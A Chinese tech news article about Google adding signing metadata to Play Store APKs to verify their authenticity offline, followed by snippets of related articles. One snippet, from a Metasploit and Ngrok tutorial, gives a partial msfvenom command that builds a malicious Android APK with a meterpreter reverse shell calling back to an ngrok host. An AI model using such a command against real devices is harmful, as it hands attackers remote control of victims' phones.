Android APK增DRM驗證 以確保Play商店應用的真實性

2020-12-06 太平洋電腦網

儘管「數字版權保護」(DRM)是一項被音視頻愛好者深惡痛絕的功能,但這並不意味著它無法在其它方面發揮積極的作用。 據外媒報導,為了提升 Android 應用安裝包(APK)文件的真實安全性,谷歌決定為 Play 商店的應用引入某種形式的 DRM 。 據悉,這套機制與 Windows 平臺上的驅動程序籤名很是相似。

(應用籤名前後對比)

給 app 添加 DRM 籤名的目的很簡單 —— 通過確保用戶使用的是不被篡改的應用,從而提升 Android 用戶的安全體驗。

有趣的是,Google 並沒有將這種新機制稱作『DRM』,而是說它在 APK 之上添加了『少量的安全元數據』,以驗證 APK 是否由 Google Play 分發。

(APK 完整性保護)

Google 表示, 引入該機制的一個原因,是為了幫助 開發 者接觸到更廣泛的用戶群體 —— 特別是那些因為連接受限和流量套餐昂貴,而導致 p2p 應用分享變得常見的地區市場。

新機制意味著,無論設備是否在線,都可以認定 app 的真實性。它不僅適用於通過 Play Store 分發的 app,還適用於那些授權的應用分發渠道。

(APK 籤名驗證過程,新步驟以紅色顯示)

不過截止目前,Google 似乎還停留於向開發者兜售這一想法(而不是直接面向 Android 用戶)的階段。

相關焦點

  • google play商店閃退解決辦法教程
    google play商店閃退解決辦法教程 來源:www.18183.com作者:jinwei1990時間:2014-10-16 很多玩家在使用google play商店的時候都會發生閃退之類的問題
  • Android系統APK文件詳解
    APK文件其實是zip格式,但後綴名被修改為apk,通過UnZip解壓後,可以看到Dex文件,Dex是Dalvik VM executes的全稱,即Android Dalvik執行程序,並非Java ME的字節碼而是Dalvik字節碼。
  • 谷歌Play商店剔除了11款帶有Joker惡意軟體的Android應用
    以色列網絡安全公司 Check Point 的安全研究人員發現,幕後開發者對這些應用的代碼機型了修改,以繞過 Play 商店的安全性審查。慶幸的是,谷歌已經注意到了此事,並於近日在 Play 商店中剔除了 11 款帶有 Joker 惡意軟體的 Android 應用。
  • 如何確保您的Google Play服務APK已更新
    每當Google更新其Play服務APK時,更新您的應用也很重要。請繼續閱讀以了解此快速流程。如果您的應用使用任何Google API,則需要確保您的設備已更新Google Play服務APK。首先,您必須確定需要插入代碼以更新Google Play服務的準確位置。如果您的應用完全基於Google Play服務,那麼您可以在最初啟動應用時執行此操作。
  • Android版Instagram登陸Google Play
    Instagram for AndroidInstagram 這款 iPhone上最流行的拍照分享應用,如今這款備受Android用戶期待的應用終於在千呼萬喚中登陸Google Play應用商店。平均每分鐘就有2000的下載量,這也讓 Instagram 成為Google Play平臺有史以來最火爆的應用之一。UI界面清爽,App簡單易操作。除了 Instagram 應用在 iOS 平臺的的名氣之外,免費下載、兼容 Android 2.2 Froyo 設備等都是 Android 版 Instagram 的亮點。
  • 從Google Play直接下載APK文件
    因為運營商、機型、或者地區限制等原因,很多Google Play上的應用無法下載。是不是很苦惱?你可以從第三方市場去尋找,可總有找不到的時候,極客用戶是無法忍受心儀的應用無法下載的。之前曾有過通過在Chrome上安裝插件的形式來從Google Play商店直接下載APK的方式,但這早已經被Google封殺掉了。
  • 支付寶被谷歌應用商店下架?實為更新安裝包修改
    昨日,有人在V2EX論壇上發帖詢問,「支付寶被 google play 下架了?」發帖者發現支付寶被下架的過程讓人哭笑不得,他說,最近一直提示我更新, 今天忽然沒有聲響, 然後上去 google play 看看, 發現沒了支付寶的應用。
  • 華為測試「 AppSearch」下載應用程式,無需使用Google Play商店
    這對華為來說是個問題,因為絕大多數Android應用程式都是通過Google Play商店發布的,所以華為不得不在自己的AppGallery應用程式商店裡擴充應用程式目錄。然而,仍有許多流行的Android應用程式無法在AppGallery上使用,這迫使用戶安裝其他應用程式商店,如亞馬遜(Amazon)或Aptoide,或從APKMirror等託管網站下載APK文件。
  • Android壓力測試Monkey工具
    通過這個實例,我們能理解Monkey測試的步驟以及如何知道哪些應用程式能夠用Monkey進行測試。註:我們能測試的應用程式包都在這個目錄下面C:\Documents and Settings\Administrator>adb shell# ls data/datals data/datacom.google.android.btroutercom.android.providers.telephonycom.android.mms
  • 抓緊收藏,這4個網站可以直接下谷歌商店apk。無需安裝服務框架!
    好了,讓我們直接進入正題,小編今天整理了5個可以直接下載谷歌應用的方法,主要分享給需要的用戶,對於資深玩家可能都是小兒科了,不喜勿噴。第一:apkdl好消息、好消息,這個網站呢直接在百度搜索關鍵詞「apkdl」就可以進入到這個網站,並且不需要其他的工具,和安裝其他的服務框架,誰用誰知道。小編也截圖了部分應用列表。是不是有點動心了呢?先不要著急。
  • Google Play音樂步步高升,Play商店下載量達50億
    IT之家10月28日消息 據外媒androidpolice報導,我們都知道Google Play音樂的時代已經過去了,但這並不意味著Google Play音樂將被遺忘,相反,在「退役」之前,該應用程式現在在Play商店中的下載量已超過50億次。
  • 這款惡意應用在谷歌 Play 商店存 11 個月,近日才被移除
    在去年11月底登上Google Play的Simple Call Recorder約有5000次的安裝次數,具備完整的電話錄音功能,但主要目的卻是要求使用者下載及安裝一個偽裝成Flash Player的更新應用,只是該更新應用實質上為惡意應用。
  • 谷歌醞釀應用分發調整:Play商店將為不同機型定製專屬APK
    據Android Police報導,谷歌在I/O 2018大會上新推出的Android App Bundle(安卓應用捆包)和 同時,谷歌考慮了一種聯動機制,比如你將語言從中文切換到英文,那麼APK也會整合英文語言包,整個過程平滑靜默,確保用戶自然過渡。 另外一個比較重要的變化就是APK功能可自主選擇,比如一個文本應用準備升級到加入語音功能,那麼這個功能點用戶可以決定是否部署。當然,如果開發者將其打包到基礎包中,那就意味著不得不升級了。
  • 夏普電視應用商店在哪裡
    首先確認夏普電視型號是否為智能電視,一般只有智能電視才有應用商店;確認好以後將電視開機,在電視主界面找到本地應用並點開;頁面彈開後就可以看到應用商店,打開之後就可以看到裡面的內容了。  如果遇上智能電視自帶的應用商店打不開或者沒有的話,安裝一個第三方的電視應用商店就可以了。
  • 一份禮物.apk -O泡果奶 的逆向分析
    剛好看到社團群裡在討論這個,於是就發揮專業特長分析一下拿到apk ,第一步肯定先放到虛擬機裡跑一下看下效果emmm這似曾相識的頁面,這熟悉的音量,唯一變化的就是音樂變成了O泡果奶的魔性洗腦廣告。懂了,這不就是 "送給最好的ta.apk" 嗎?
  • 如何用電腦下載Google Play上的APK文件
    1進入Chrome,點擊https://codekiem.com/apk-downloader/crx/1.2.1.crx下載apk-downloader插件,這個是文章的主角,下載完成後會蹦出設置選項(圖3),如果沒有出來就需要你到擴展程序裡找到apk-downloader,然後點選項。(如果你沒有進行第二項操作,則會出現圖3的警告提示。)
  • 允許三方分發APK!谷歌Play商店將支持離線認證安裝
    Play商店是安裝谷歌官方認證應用的唯一渠道,而且只能在線使用。不過,谷歌稱,為了幫助開發者擴大應用的部署量級,Play商店將加入離線安裝功能。谷歌Play產品經理James Bender介紹,今後,Play商店將為APK文件的頭部添加一段新的籤名認證元數據,如果你是從其它應用分發渠道拿到的離線APK,在認證通過後照樣能通過Play商店進行部署。未來聯網後,該應用就會和谷歌帳號綁定,接受正常的更新服務。
  • android藍牙相關框架專題及常見問題 - CSDN
    代碼來源於Android P,本文相關代碼:client:frameworks/base/core/java/android/bluetooth/*system/bt/binder/android/bluetooth/**.aidlservie:framework/base/services/core/java/com/android/server/BluetoothService.java
  • 通過Metasploit+Ngrok穿透內網長期維持訪問外網Android設備
    /sunnyclientidid這個是埠轉髮腳本成功運行的樣子3.用Metasploit生成載有惡意Payload的Android的apk並且籤名apk:在KaliLinux裡面打開一個新的窗口輸入msfvenom-pandroid/meterpreter/reverse_tcpLHOST=free.ngrok.ccLPORT
  • 儘管谷歌Play商店是Android上最大的手機遊戲市場
    儘管Google Play商店是Android上最大的手機遊戲市場,但還有其他一些第三方應用商店可供開發人員發布遊戲。通過在這些第三方應用程式商店上發布其遊戲,開發人員可以將其收入翻倍,但每個應用程式商店都有其自己的一套要求,而在多個平臺上進行發布對於具有小型團隊的開發人員而言可能是艱巨的任務。這是Unity Distribution Portal的入口。